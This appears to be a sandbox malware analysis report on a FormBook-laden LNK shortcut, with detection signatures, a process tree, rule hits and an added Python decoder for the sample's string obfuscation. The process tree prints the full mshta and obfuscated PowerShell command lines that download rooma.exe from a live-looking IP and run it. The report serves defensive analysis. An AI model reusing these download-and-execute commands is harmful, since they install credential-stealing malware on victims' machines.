Windows
Analysis Report
Offer Document 24.lnk
Overview
General Information
Detection
FormBook
Score | Range | Whitelisted | Confidence |
---|---|---|---|
100 | 0 - 100 | false | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Windows shortcut file (LNK) starts blacklisted processes
Yara detected FormBook
AI detected suspicious sample
Found URL in windows shortcut file (LNK)
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Powershell drops PE file
Queues an APC in another process (thread injection)
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows shortcut file (LNK) contains suspicious command line arguments
Checks if the current process is being debugged
Connects to several IPs in different countries
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Dosfuscation Activity
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- powershell.exe (PID: 5872, cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" . $env:C:\W*\S*2\m*h?a.* 'http://20.86.128.223/room/room4.hta', MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 6984, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- mshta.exe (PID: 7268, cmdline: "C:\Windows\System32\mshta.exe" http://20.86.128.223/room/room4.hta, MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
- powershell.exe (PID: 7388, cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function LQhlh($iAXOUnjQ, $bjGcHEb){[IO.File]::WriteAllBytes($iAXOUnjQ, $bjGcHEb)};function zkkoODnkdOXlr($iAXOUnjQ){if($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47179,47187,47187))) -eq $True){rundll32.exe $iAXOUnjQ }elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47191,47194,47128))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $iAXOUnjQ}elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47188,47194,47184))) -eq $True){misexec /qn /i $iAXOUnjQ}else{Start-Process $iAXOUnjQ}};function fbUysIvJpUzDJbgt($WeuPtAwBrGuTyyLeSBEJ){$TPKepUYDmoAFjOHRfuEf = New-Object (KgQIevZJx @(47157,47180,47195,47125,47166,47180,47177,47146,47187,47184,47180,47189,47195));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$bjGcHEb = $TPKepUYDmoAFjOHRfuEf.DownloadData($WeuPtAwBrGuTyyLeSBEJ);return $bjGcHEb};function KgQIevZJx($eTHmOcKqIU){$kIWXaGUQZYbt=47079;$PDFpjjruzXwZezIX=$Null;foreach($QNJiuRDs in $eTHmOcKqIU){$PDFpjjruzXwZezIX+=[char]($QNJiuRDs-$kIWXaGUQZYbt)};return $PDFpjjruzXwZezIX};function iMoBwPUgEkDDhYs(){$bzNVNMxsa = $env:AppData + '\';$fLaod = $bzNVNMxsa + 'rooma.exe'; if (Test-Path -Path $fLaod){zkkoODnkdOXlr $fLaod;}Else{ $movKnuBo = fbUysIvJpUzDJbgt (KgQIevZJx @(47183,47195,47195,47191,47137,47126,47126,47129,47127,47125,47135,47133,47125,47128,47129,47135,47125,47129,47129,47130,47126,47193,47190,47190,47188,47126,47193,47190,47190,47188,47176,47125,47180,47199,47180));LQhlh $fLaod $movKnuBo;zkkoODnkdOXlr $fLaod;};;;;}iMoBwPUgEkDDhYs;, MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 7396, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- rooma.exe (PID: 7536, cmdline: "C:\Users\user\AppData\Roaming\rooma.exe", MD5: 1DCCE19E1A6306424D073487AF821FF0)
- TmjHHkXnMrncRmISMzN.exe (PID: 4472, cmdline: "C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe", MD5: 32B8AD6ECA9094891E792631BAEA9717)
- netbtugc.exe (PID: 7792, cmdline: "C:\Windows\SysWOW64\netbtugc.exe", MD5: EE7BBA75B36D54F9E420EB6EE960D146)
- TmjHHkXnMrncRmISMzN.exe (PID: 3780, cmdline: "C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe", MD5: 32B8AD6ECA9094891E792631BAEA9717)
- firefox.exe (PID: 8128, cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe", MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
- svchost.exe (PID: 7576, cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
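The second powershell.exe command line in the tree (PID 7388) carries none of its strings in clear text: each one is rebuilt at runtime by the function KgQIevZJx, which subtracts the fixed key 47079 from every integer in an @( ... ) array and casts the result to [char]. The Python below is an analyst's aid added to this page; it is neither the sample's code nor Joe Sandbox output. SCRIPT is a constructed excerpt of that command line, copied from the report with the extraction spaces removed; the script recovers the key from the [char]($x-$key) expression rather than from the obfuscated variable name, decodes every array in order of appearance, and also checks the wildcard path used by the first powershell.exe command line (PID 5872) against a constructed list of candidate paths, assuming the $env:C:\ prefix resolved to C:\ (the mshta.exe child process in the tree is consistent with that).

```python
import fnmatch
import re

# Constructed excerpt of the second powershell.exe command line (PID 7388),
# copied from the report with the extraction spaces removed. KgQIevZJx is the
# sample's own string decoder:
#   foreach($x in $arr){ $out += [char]($x - $key) }   with $key = 47079
SCRIPT = (
    "function zkkoODnkdOXlr($iAXOUnjQ){"
    "if($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47179,47187,47187))) -eq $True)"
    "{rundll32.exe $iAXOUnjQ }"
    "elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47191,47194,47128))) -eq $True)"
    "{powershell.exe -ExecutionPolicy unrestricted -File $iAXOUnjQ}"
    "elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47188,47194,47184))) -eq $True)"
    "{misexec /qn /i $iAXOUnjQ}else{Start-Process $iAXOUnjQ}};"
    "function fbUysIvJpUzDJbgt($WeuPtAwBrGuTyyLeSBEJ){"
    "$TPKepUYDmoAFjOHRfuEf = New-Object (KgQIevZJx @(47157,47180,47195,47125,"
    "47166,47180,47177,47146,47187,47184,47180,47189,47195));"
    "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;"
    "$bjGcHEb = $TPKepUYDmoAFjOHRfuEf.DownloadData($WeuPtAwBrGuTyyLeSBEJ);"
    "return $bjGcHEb};"
    "function KgQIevZJx($eTHmOcKqIU){$kIWXaGUQZYbt=47079;$PDFpjjruzXwZezIX=$Null;"
    "foreach($QNJiuRDs in $eTHmOcKqIU){"
    "$PDFpjjruzXwZezIX+=[char]($QNJiuRDs-$kIWXaGUQZYbt)};"
    "return $PDFpjjruzXwZezIX};"
    "function iMoBwPUgEkDDhYs(){$bzNVNMxsa = $env:AppData + '\\';"
    "$fLaod = $bzNVNMxsa + 'rooma.exe'; "
    "if (Test-Path -Path $fLaod){zkkoODnkdOXlr $fLaod;}"
    "Else{ $movKnuBo = fbUysIvJpUzDJbgt (KgQIevZJx @(47183,47195,47195,47191,"
    "47137,47126,47126,47129,47127,47125,47135,47133,47125,47128,47129,47135,"
    "47125,47129,47129,47130,47126,47193,47190,47190,47188,47126,47193,47190,"
    "47190,47188,47176,47125,47180,47199,47180));"
    "LQhlh $fLaod $movKnuBo;zkkoODnkdOXlr $fLaod;};;;;}iMoBwPUgEkDDhYs;"
)

# [char]($x-$key): the subtraction inside the decoder names the key variable.
KEY_USE_RE = re.compile(r"\[char\]\(\$\w+\s*-\s*\$(\w+)\)")
# @(n1,n2,...): every integer array literal in the script.
ARRAY_RE = re.compile(r"@\(\s*((?:\d+\s*,\s*)*\d+)\s*\)")


def find_key(script):
    """Recover the subtraction key without relying on the obfuscated variable
    name: locate the [char]($x-$key) expression, then the literal assigned to $key."""
    use = KEY_USE_RE.search(script)
    if use is None:
        raise ValueError("no [char]($x-$key) decoder pattern found")
    key_var = use.group(1)
    assign = re.search(r"\$" + re.escape(key_var) + r"\s*=\s*(\d+)", script)
    if assign is None:
        raise ValueError("$" + key_var + " is never assigned an integer literal")
    return int(assign.group(1))


def decode_array(codes, key):
    """Apply the sample's transform: each code minus the key, as one character."""
    return "".join(chr(c - key) for c in codes)


def decode_all(script):
    """Decode every @(...) integer array in the script, in order of appearance."""
    key = find_key(script)
    return [
        decode_array([int(c) for c in m.group(1).split(",")], key)
        for m in ARRAY_RE.finditer(script)
    ]


# The first powershell.exe command line (PID 5872) does not name mshta.exe; it
# invokes a wildcard path. Assumption: the $env:C:\ prefix resolved to C:\.
LNK_GLOB = r"C:\W*\S*2\m*h?a.*"

# Constructed candidate paths, used only to show what the wildcard selects.
CANDIDATES = [
    r"C:\Windows\System32\mshta.exe",
    r"C:\Windows\System32\msra.exe",
    r"C:\Windows\System32\mmc.exe",
    r"C:\Windows\SysWOW64\mshta.exe",
]


def resolve_glob(pattern, candidates):
    """Return the candidates the wildcard path matches (case-sensitive check)."""
    return [c for c in candidates if fnmatch.fnmatchcase(c, pattern)]


if __name__ == "__main__":
    print("key:", find_key(SCRIPT))
    for s in decode_all(SCRIPT):
        print(repr(s))
    print("LNK wildcard resolves to:", resolve_glob(LNK_GLOB, CANDIDATES))
```

Decoding yields, in order, the three extension checks (.dll, .ps1, .msi), the class name Net.WebClient, and the payload URL http://20.86.128.223/room/rooma.exe, which is consistent with the rooma.exe the tree shows running from the user's AppData\Roaming directory. Note that the .msi branch calls misexec rather than msiexec in the command line as recorded, so that branch would fail as written; the sample's payload is an .exe and takes the Start-Process path instead. Among the constructed candidates only C:\Windows\System32\mshta.exe satisfies the wildcard, which is why the shortcut can reach mshta.exe without its name appearing in the LNK.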
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Formbook, Formbo | FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware. | | | |
No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| | Windows_Trojan_Formbook_1112e116 | unknown | unknown | |
| | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| | Windows_Trojan_Formbook_1112e116 | unknown | unknown | |
| | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |

Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | |
| | Windows_Trojan_Formbook_1112e116 | unknown | unknown | |
System Summary
Source: | Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp) |